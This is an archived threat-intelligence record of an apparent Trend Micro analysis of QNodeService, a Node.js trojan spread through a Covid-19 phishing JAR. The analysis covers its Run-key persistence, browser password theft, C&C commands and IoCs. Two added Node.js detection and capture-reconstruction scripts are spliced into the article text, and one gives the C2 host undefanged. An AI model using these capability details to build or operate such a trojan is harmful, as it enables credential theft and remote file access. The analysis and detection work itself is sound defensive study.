{
	"id": "92c407a4-ad5e-44da-9414-93a53aef2db8",
	"created_at": "2026-04-06T00:13:45.19593Z",
	"updated_at": "2026-04-10T13:12:14.346279Z",
	"deleted_at": null,
	"sha1_hash": "0e828fc09a79b94ba670dfbed587f238e6fedb96",
	"title": "QNodeService: Node.js Trojan Spread via Covid-19 Lure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 57330,
	"plain_text": "QNodeService: Node.js Trojan Spread via Covid-19 Lure\r\nBy Matthew Stewart (1457 words)\r\nPublished: 2020-06-09 · Archived: 2026-04-05 21:03:25 UTC\r\nQNodeService is a new, undetected malware sample written in Node.js, which is an unusual choice for malware authors. The malware has functionality that enables it to download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things.\r\nWe recently noticed a Twitter post by MalwareHunterTeam that showed a Java downloader with a low detection rate. Its name, “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”, suggests it may have been used in a Covid-19-themed phishing campaign. Running this file led to the download of a new, undetected malware sample written in Node.js; we dubbed this trojan “QNodeService”.\r\nThe use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.\r\nThe malware targets Windows systems, but its design and certain pieces of code suggest cross-platform compatibility may be a future goal.\r\nThe infection begins with a Java downloader which, in addition to downloading Node.js, downloads the following files: “wizard.js”, and “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”.
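Before going into the analysis, here is an added example written for this edit; it is not Trend Micro's code and not the malware's. It is a small Node.js triage script that applies the indicators collected in the rest of this post (node.exe dropped into the user profile, wizard.js launched with the C\u0026C host and a “group user:” argument, the qnodejs-\u003c8 hex\u003e.cmd launcher registered under the HKCU Run key, the qnodejs-win32-ia32/x64.js payload, and the central.qhub.qua.one host) to constructed endpoint evidence. The evidence shapes (Run values, process command lines, a file list), the Windows paths, the subscription value and the argument layout are assumptions; only the file names, the registry key and the host come from the post.

```javascript
'use strict';
// Added example (not Trend Micro's or the malware's code): triage constructed
// endpoint evidence for the QNodeService infection chain described in the post.
// Indicators: node.exe in the user profile, wizard.js run with the C2 host and a
// 'group user:' argument, a qnodejs-<8 hex>.cmd launcher in the HKCU Run key,
// and the qnodejs-win32-{ia32,x64}.js payload on disk.

const C2_HOST = 'central.qhub.qua.one';   // C2 host from the IoC list
const RUN_KEY = 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run';
const PAYLOAD_RE = /(^|[\\/])qnodejs-win32-(ia32|x64)\.js$/i;
const LAUNCHER_RE = /(^|[\\/])qnodejs-[0-9a-f]{8}\.cmd$/i;
const WIZARD_RE = /(^|[\\/])wizard\.js$/i;
const NODE_RE = /(^|[\\/])node\.exe$/i;
const USER_PROFILE_RE = /^[a-z]:\\users\\[^\\]+\\/i;   // C:\Users\<name>\...
const DQ = String.fromCharCode(34);                     // a double-quote character

// First token of a Windows command line, honouring a quoted image path.
function imagePath(cmdline) {
  const s = cmdline.trim();
  if (s.startsWith(DQ)) {
    const end = s.indexOf(DQ, 1);
    return end > 0 ? s.slice(1, end) : s.slice(1);
  }
  return s.split(/\s+/)[0];
}

// Apply the command-line rules to one Run value or process record. The dash
// style of the 'group' switch varies between renderings of the post, so the
// check keys on the 'group user:' part only (assumption).
function inspectCommandLine(cmdline, where) {
  const image = imagePath(cmdline);
  const lower = cmdline.toLowerCase();
  const findings = [];
  if (NODE_RE.test(image) && USER_PROFILE_RE.test(image)) {
    findings.push({ rule: 'node-in-user-profile', where, image });
  }
  if (LAUNCHER_RE.test(image)) {
    findings.push({ rule: 'qnodejs-cmd-launcher', where, image });
  }
  if (lower.includes('wizard.js') && lower.includes('group user:')) {
    findings.push({ rule: 'wizard-js-with-group-arg', where, image });
  }
  if (lower.includes(C2_HOST)) {
    findings.push({ rule: 'known-c2-host', where, image });
  }
  return findings;
}

// Triage a bundle of evidence: HKCU Run values, process command lines and a
// file listing. Returns one finding per matched rule.
function triage(evidence) {
  const findings = [];
  for (const v of evidence.runValues) {
    findings.push(...inspectCommandLine(v.data, RUN_KEY + '\\' + v.name));
  }
  for (const p of evidence.processes) {
    findings.push(...inspectCommandLine(p.cmdline, 'pid ' + p.pid));
  }
  for (const f of evidence.files) {
    if (PAYLOAD_RE.test(f)) findings.push({ rule: 'qnodejs-payload-on-disk', where: f, image: f });
    if (WIZARD_RE.test(f) && USER_PROFILE_RE.test(f)) findings.push({ rule: 'wizard-js-on-disk', where: f, image: f });
  }
  return findings;
}

// Constructed sample evidence (not from a real host): a benign Run value and a
// benign node.exe process next to the artefacts the post describes. The
// subscription value and argument order are made up; only the 'user:' prefix,
// the file names and the host come from the post.
const SAMPLE_EVIDENCE = {
  runValues: [
    { name: 'OneDrive', data: DQ + 'C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe' + DQ + ' /background' },
    { name: 'qnodejs', data: 'C:\\Users\\alice\\qnodejs-1a2b3c4d.cmd' },
  ],
  processes: [
    { pid: 4120, cmdline: DQ + 'C:\\Program Files\\nodejs\\node.exe' + DQ + ' C:\\dev\\app\\server.js' },
    { pid: 5532, cmdline: DQ + 'C:\\Users\\alice\\node.exe' + DQ + ' C:\\Users\\alice\\wizard.js https://' + C2_HOST + '/ --group user:123@example-subscription' },
  ],
  files: [
    'C:\\Users\\alice\\wizard.js',
    'C:\\Users\\alice\\qnodejs-win32-x64.js',
    'C:\\dev\\app\\server.js',
  ],
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of triage(SAMPLE_EVIDENCE)) console.log(f.rule.padEnd(26), f.where);
}
```

Run with node and the constructed evidence yields six findings (launcher in the Run key, node.exe in the profile, wizard.js with the group argument, the C\u0026C host, and the two dropped files); the benign OneDrive value and the Program Files node.exe produce none. Feed it real data by exporting the Run key, a process list with command lines, and a directory listing of the user profile.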
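The file-manager/forward-access and http-forward commands (see the command table and Figures 14 to 17 below) let an operator pull a file through the C\u0026C relay only with a token the bot itself issued. As an added example, not Trend Micro's code and not the malware's, the following Node.js script reconstructs that exchange from a constructed, already-decrypted WebSocket capture and reports which http-forward requests carried a token the bot had actually issued. The 42[...] framing is socket.io's standard event encoding; the JSON field names (url, token, path, status, body), the bot's reply event name, and the token and URL values are assumptions made for the example, since the post shows the commands but not the exact message shapes.

```javascript
'use strict';
// Added example (not Trend Micro's or the malware's code): reconstruct the
// file-manager/forward-access -> http-forward relay described in the post from
// a captured, already-decrypted WebSocket conversation. The 42[...] framing is
// socket.io's standard event encoding (engine.io MESSAGE + socket.io EVENT).
// Field names and the bot's reply event are assumptions for the example.

// Build a socket.io event frame; used only to construct the sample capture.
function eventFrame(event, data) {
  return '42' + JSON.stringify([event, data]);
}

// Decode one WebSocket text frame. Returns null for engine.io pings ('2'),
// pongs ('3'), the socket.io connect packet ('40') and anything malformed.
function decodeEventFrame(frame) {
  if (typeof frame !== 'string' || !frame.startsWith('42')) return null;
  let parsed;
  try { parsed = JSON.parse(frame.slice(2)); } catch (e) { return null; }
  if (!Array.isArray(parsed) || typeof parsed[0] !== 'string') return null;
  return { event: parsed[0], data: parsed[1] === undefined ? null : parsed[1] };
}

// Walk the conversation in order. A forward-access request from the C2 is
// answered by the bot with a URL and token; every later http-forward from the
// C2 is then judged against the tokens the bot issued, which is the check the
// post says the malware performs before returning a file.
function reconstructForwarding(capture) {
  const issued = new Map();                 // token -> forwarding URL
  const report = { issued: [], forwards: [] };
  let awaitingAccessReply = false;
  for (const rec of capture) {
    const ev = decodeEventFrame(rec.frame);
    if (!ev) continue;
    if (rec.dir === 'c2->bot' && ev.event === 'file-manager/forward-access') {
      awaitingAccessReply = true;
    } else if (rec.dir === 'bot->c2' && awaitingAccessReply && ev.data && ev.data.token) {
      issued.set(ev.data.token, ev.data.url);
      report.issued.push({ token: ev.data.token, url: ev.data.url });
      awaitingAccessReply = false;
    } else if (rec.dir === 'c2->bot' && ev.event === 'http-forward') {
      const d = ev.data || {};
      report.forwards.push({ path: d.path, token: d.token, authorized: issued.has(d.token) });
    }
  }
  return report;
}

// Paths the bot would have served, i.e. candidate exfiltrated files.
function servedPaths(report) {
  return report.forwards.filter((f) => f.authorized).map((f) => f.path);
}

// Constructed capture (direction + raw frame). Token, URL path and the second
// request are made up; the foo.txt file with contents 'bar' is the one used
// in the post's Figure 16.
const SAMPLE_CAPTURE = [
  { dir: 'c2->bot', frame: '40' },
  { dir: 'c2->bot', frame: eventFrame('file-manager/forward-access', {}) },
  { dir: 'bot->c2', frame: eventFrame('file-manager/forward-access', { url: 'https://central.qhub.qua.one/forward/7f3a', token: '9e1c0b2d' }) },
  { dir: 'c2->bot', frame: '2' },
  { dir: 'bot->c2', frame: '3' },
  { dir: 'c2->bot', frame: eventFrame('http-forward', { token: '9e1c0b2d', path: 'C:\\foo.txt' }) },
  { dir: 'bot->c2', frame: eventFrame('http-forward', { status: 200, body: 'bar' }) },
  { dir: 'c2->bot', frame: eventFrame('http-forward', { token: 'deadbeef', path: 'C:\\Users\\alice\\Documents\\notes.docx' }) },
  { dir: 'bot->c2', frame: eventFrame('http-forward', { status: 403 }) },
];

if (typeof require !== 'undefined' && require.main === module) {
  const report = reconstructForwarding(SAMPLE_CAPTURE);
  console.log(JSON.stringify(report, null, 2));
  console.log('served:', servedPaths(report));
}
```

On the constructed capture the report lists one issued token, marks the request for C:\\foo.txt as authorized and the request with the unknown token as not authorized, so servedPaths() returns only C:\\foo.txt. During an incident the same walk over a real decrypted capture tells you which files actually left the host, as opposed to which were merely requested.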
We analyzed these components to learn more about their behavior.\r\nAnalysis of Java Downloader\r\nThe sample mentioned above, “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar”, serving as the Java downloader, has been obfuscated with the Allatori obfuscator. Allatori adds junk code and obfuscates strings to make analysis more difficult. We deobfuscated the code to be able to start the analysis.\r\nFigure 1. Decompiled code of the sample (obfuscated with Allatori obfuscator)\r\nFigure 2. Deobfuscated code of the sample\r\nIt downloads Node.js to the User Profile directory. It checks the system architecture and downloads the 32-bit or 64-bit version accordingly.\r\nFigure 3. Code snippet for downloading Node.js to the user directory\r\nIt also downloads a file named “wizard.js” from the URL hxxps://central.qhub.qua.one/scripts/wizard.js. It then runs this file using Node.js with multiple command line arguments, including the URL of the C\u0026C server:\r\nFigure 4. wizard.js being run by Node.js\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/\r\nPage 1 of 5\n\nNote that “–group user:476@qhub-subscription[…]” is a parameter used during communication with the C\u0026C server; the presence of a user identifier and mention of a “subscription” suggest that this malware may be sold as a subscription service.\r\nAnalysis of wizard.js\r\nThe wizard.js file is an obfuscated JavaScript (Node.js) file. It is responsible for persistence (by creating a “Run” registry key entry) and for downloading another payload depending on the system architecture.\r\nIt creates a file named “qnodejs-\u003c8 digit hex number\u003e.cmd” which contains the arguments used to launch the payload.
This is invoked by the registry key entry it creates at “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”. It also checks whether it’s running on a Windows platform, suggesting the authors may have cross-platform compatibility in mind.\r\nFigure 5. wizard.js checks if it’s running on Windows, and installs the Run registry key entry if so\r\nFigure 6. The registry “Run” key entry added by wizard.js\r\nIt downloads a file from hxxps://central.qhub.qua.one/scripts/qnodejs-\u003cplatform\u003e-\u003carch\u003e.js. Based on possible values for process.platform and process.arch in Node.js, we found files qnodejs-win32-ia32.js and qnodejs-win32-x64.js hosted on the server. The server also hosts a hash for each sample; the files are named .sha256 but actually contain SHA-1 hashes. These hashes are downloaded and checked by the downloaded sample when it runs.\r\nFigure 7. Using process.platform and process.arch to determine the payload to download\r\nAnalysis of qnodejs-win32-\u003carchitecture\u003e.js\r\nA file named qnodejs-win32-ia32.js or qnodejs-win32-x64.js is downloaded based on the system architecture (whether the OS is 64-bit or 32-bit).\r\nThe files contain an embedded “node_modules” folder with libraries for Node.js, which is extracted upon execution. Unlike the JavaScript code itself, these libraries are architecture-specific, which is the reason separate files are distributed based on system architecture. Screenshots below are based on the “win32-ia32” variant from 2020-04-30.\r\nWe named this malware “QNodeService,” since this seems to be the name used internally, as indicated by the code that validates command line arguments.\r\nFigure 8.
The name “QNodeService” used internally in the code\r\nThe malware is divided into modules. Access to these modules is obfuscated with the use of a lookup function named “v”. Some modules consist solely of a “require” call to import libraries, while others are custom modules written by the author.\r\nFigure 9. Modules used by the malware\r\nFigure 10. Modules are referenced by index with lookup function “v”\r\nCertain modules in this file are identical to wizard.js; in particular, these reuse the code that determines the URL for the sample and its hash. In this file, the module is used to download the published SHA-1 hash and verify the sample against it. If the hash check fails, the malware terminates.\r\nThe malware uses the socket.io library for communication with the C\u0026C server. As a result, it is written in an event-driven (reactive) style and uses WebSocket to communicate with the server.\r\nFigure 11. WebSocket handshake\r\nThe malware can steal passwords from Chrome and Firefox.\r\nFigure 12. Code snippets for stealing passwords from Chrome\r\nFigure 13.
Code snippets for stealing passwords from Firefox\r\nBelow is a list of commands accepted by the malware (command – description):\r\ncontrol/reload – Signals wizard.js to redownload the main payload.\r\ncontrol/uninstall – Signals wizard.js to remove the Run key entry from the system and terminate.\r\ninfo/get-ip-address – Gets IP address, location, hostname, etc.\r\ninfo/get-label – Returns the label set by the “set-label” command.\r\ninfo/get-machine-uuid – Gets a UUID generated by the malware.\r\ninfo/get-os-name – Gets the platform (windows) and architecture (x32/x64) of the system.\r\ninfo/get-user-home – Gets the user profile directory (os.homedir()).\r\ninfo/set-label – Sets the label.\r\nfile-manager/absolute – Gets the full path of a file.\r\nfile-manager/execute – Executes a file with the command ‘start “” /B \u003cfile\u003e’.\r\nfile-manager/delete – Removes a file or files on the system (accepts globs, using the “rimraf” library).\r\nfile-manager/forward-access – Generates the URL and token to use for the “http-forward” command (see below).\r\nfile-manager/list – Lists files in specific directories.\r\nfile-manager/mkdirs – Creates a directory on the system.\r\nfile-manager/write – Writes a file sent from the C\u0026C server onto the system.\r\nhttp-forward – HTTP requests sent to a specific URL at the C\u0026C are routed to the infected machine (see below).\r\npassword-recovery/applications – Lists applications for which passwords can be read (Chrome \u0026 Firefox).\r\npassword-recovery/recover – Recovers passwords from a specific application (Chrome or Firefox).\r\nOn May 5th, the malware was updated with three additional commands:\r\ninfo/get-tags – Returns the list of tags set by the “add-tag” command.\r\ninfo/add-tag – Adds tags.\r\ninfo/remove-tag – Removes tags.\r\nOf particular note is the http-forward command, which allows an attacker to download a file without directly connecting
to the victim machine, as shown below in Figures 14 to 17. However, a valid request path and access token are required to access files on the machine. The C\u0026C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.\r\nFigure 14. C\u0026C server sends “file-manager/forward-access” command over WebSocket\r\nFigure 15. The malware responds with the access token and URL that are used in the cURL request in Figure 16\r\nThe malware responds with the forwarding URL and access token. Then, a third party who has been given the URL and access token could send an HTTP request to the C\u0026C server to retrieve files from the victim machine without directly connecting to it.\r\nFigure 16. An HTTP cURL request to the C\u0026C server requesting “C:\\foo.txt” (with contents “bar”)\r\nThe C\u0026C server forwards the HTTP request to the malware on the victim machine using the http-forward command. If the access token is correct, the malware sends the file’s contents back to the C\u0026C server, which in turn sends the contents back to the attacker in its HTTP response, enabling remote download.\r\nFigure 17. C\u0026C server forwards the cURL request to the malware on the victim machine with the “http-forward” command\r\nSimilar to wizard.js, the authors seem to have cross-platform compatibility in mind. Although this sample is the win32-ia32 variant, it contains code that would improve compatibility on Darwin (macOS) and Linux platforms.\r\nFigure 18.
Code snippet showing cross-platform compatibility\r\nRecommendations\r\nThreat actors constantly come up with ingenious ways to create malware and ensure that it affects as many systems for as long as it can, such as using environments that are less utilized for malware creation, maintaining persistence, and giving them cross-platform compatibility. To defend against such malware, users can block them at possible entry points, such as email, endpoints, and the network, through the following security solutions:\r\nFor email – Trend Micro™ Email Security products offer AI-based detection and sandboxing capabilities to detect and block malware and malicious URLs\r\nFor endpoints – Trend Micro Apex One provides pre-execution and runtime machine learning and automated threat detection\r\nFor networks – Trend Micro TippingPoint Threat Protection System products inspect and block network traffic in real time to stop the infiltration of threats\r\nIndicators of Compromise\r\nFile name – SHA-256 – Detection name (detection names are truncated in the archived copy)\r\nJava downloader – 5210AFA4567B98FB3F8AEE513206B5FD466D3AFE01DD576A2BEE4A623F2CDAE2 – Trojan.Java.QNODESERV\r\nwizard.js (2020-04-30) – 9FBAFF43A596921EFD7BB3B015A541A00633320C3DE66BE795BADA098D37F8FE – Trojan.JS.QNODESERVIC\r\nqnodejs-win32-ia32.js (2020-04-30) – EB00CD731EE622EAF53BFD19A789E494872BACA156455C38CA3035B2E33CC152 – Backdoor.JS.QNODESER\r\nqnodejs-win32-x64.js (2020-04-30) – F3C5F8EF9886DC300BCE3E6DB0B973B3408AE82EB5789C4BA72FEC27D61CA693 – Backdoor.JS.QNODESER\r\nwizard.js (2020-05-05) – 5CCED1119F4FDC175967594EC4671EF74E645D46F5F7ED1200513C7EA7DC31CF – Trojan.JS.QNODESERVIC\r\nqnodejs-win32-ia32.js (2020-05-05) – 76B8E43AB3E38B8635588FBD9C9A527022691962DD158A480671DDF98C7110F8 – Backdoor.JS.QNODESER\r\nqnodejs-win32-x64.js (2020-05-05) – 16376D225C3B16E6E0D50259241939DE6AD19A82668F650AACDAF173576C5003 – Backdoor.JS.QNODESER\r\nC\u0026C server\r\ncentral[.]qhub[.]qua[.]one\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/"
	],
	"report_names": [
		"qnodeservice-node-js-trojan-spread-via-covid-19-lure"
	],
	"threat_actors": [],
	"ts_created_at": 1775434425,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0e828fc09a79b94ba670dfbed587f238e6fedb96.pdf",
		"text": "https://archive.orkl.eu/0e828fc09a79b94ba670dfbed587f238e6fedb96.txt",
		"img": "https://archive.orkl.eu/0e828fc09a79b94ba670dfbed587f238e6fedb96.jpg"
	}
}